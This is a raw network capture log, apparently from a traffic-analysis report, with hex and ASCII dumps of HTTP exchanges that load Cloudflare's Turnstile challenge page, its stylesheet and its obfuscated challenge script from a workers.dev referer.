2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 63 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 53 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 63 65 28 74 Data Ascii: 0;return qe=function(o){if(o===null\|\|!cr(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,c)}function c(){return Se(o,arguments,ce(t
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6e 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 2c 73 72 63 3a 72 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 6e 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 6e 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29 Data Ascii: uld not find Turnstile script tag, some features may not be available",43777);var r=e.src,n={loadedAsync:!1,params:new URLSearchParams,src:r};(e.async\|\|e.defer)&&(n.loadedAsync=!0);var o=r.split("?");return o.length>1&&(n.params=new URLSearchParams(o[1]))
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 53 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 53 2e 69 64 3d 22 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2d 66 72 22 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 68 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22 Data Ascii: yle.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.top="0px",E.style.overflow="hidden",E.style.margin="0px auto";var S=document.createElement("iframe");S.id="".concat(e,"-fr"),S.setAttribute("src",h),S.setAttribute("allow"

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:05 UTC	812	OUT	GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/ HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://5eedab40.shaullerica.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:05 UTC	1362	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 26678 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self' cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: cross-origin origin-agent-cluster: ?1 accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA referrer-policy: same-origin document-policy: js-profiling
2025-01-14 16:14:05 UTC	82	IN	Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 31 65 65 61 63 34 33 66 36 32 35 65 37 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: Server: cloudflareCF-RAY: 901eeac43f625e71-EWRalt-svc: h3=":443"; ma=86400
2025-01-14 16:14:05 UTC	1294	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:06 UTC	727	OUT	GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901eeac43f625e71&lang=auto HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:06 UTC	331	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:06 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 119548 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 901eeac83d2a78e7-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:06 UTC	1038	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c Data Ascii: m%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_success":"Success%21","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_fail
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 2c 67 36 2c 67 37 2c 67 61 2c 67 62 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 67 38 2c 67 39 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 37 39 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 38 31 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 32 31 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 32 36 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 38 31 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 35 31 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 30 34 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 Data Ascii: ,g6,g7,ga,gb,gB,gC,gG,gH,g8,g9){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(479))/1+-parseInt(gI(1281))/2(parseInt(gI(521))/3)+-parseInt(gI(1726))/4(-parseInt(gI(381))/5)+-parseInt(gI(1451))/6+-parseInt(gI(1604))/7+parseInt(
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 6f 64 65 27 3a 65 5b 68 67 28 31 36 37 37 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 68 67 28 35 38 38 29 5d 5b 68 67 28 35 31 30 29 5d 7d 2c 27 2a 27 29 29 3a 68 28 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 31 35 34 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 68 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d 28 68 68 3d 67 4a 2c 7b 27 64 63 61 49 74 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 29 7b 72 65 74 75 72 6e 20 45 28 46 2c 47 29 7d 2c 27 4a 4c 70 78 56 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 7d 2c 27 5a 5a 67 69 4f 27 3a 68 68 28 31 31 31 34 29 2c 27 4b 64 58 65 64 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 Data Ascii: ode':e[hg(1677)],'rcV':eM[hg(588)][hg(510)]},'*')):h())},g)},eM[gJ(1540)]=function(f,g,h,hh,i,j,k,l,m,n,o,s,x,B,C,D){i=(hh=gJ,{'dcaIt':function(E,F,G){return E(F,G)},'JLpxV':function(E,F){return E instanceof F},'ZZgiO':hh(1114),'KdXed':function(E,F){retur
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 76 29 7b 72 65 74 75 72 6e 20 76 3d 3d 3d 73 7d 2c 66 5b 68 69 28 38 32 30 29 5d 3d 68 69 28 39 39 31 29 2c 66 5b 68 69 28 33 37 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3e 76 7d 2c 67 3d 66 2c 67 5b 68 69 28 31 35 38 39 29 5d 28 65 2c 45 72 72 6f 72 29 29 3f 28 68 3d 65 5b 68 69 28 31 37 35 32 29 5d 2c 65 5b 68 69 28 31 34 33 38 29 5d 26 26 67 5b 68 69 28 39 33 33 29 5d 28 74 79 70 65 6f 66 20 65 5b 68 69 28 31 34 33 38 29 5d 2c 67 5b 68 69 28 38 32 30 29 5d 29 29 26 26 28 6c 3d 65 5b 68 69 28 31 34 33 38 29 5d 5b 68 69 28 35 34 36 29 5d 28 27 5c 6e 27 29 2c 67 5b 68 69 28 33 37 39 29 5d 28 6c 5b 68 69 28 31 35 37 30 29 5d 2c 31 29 29 26 26 28 6d 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c Data Ascii: 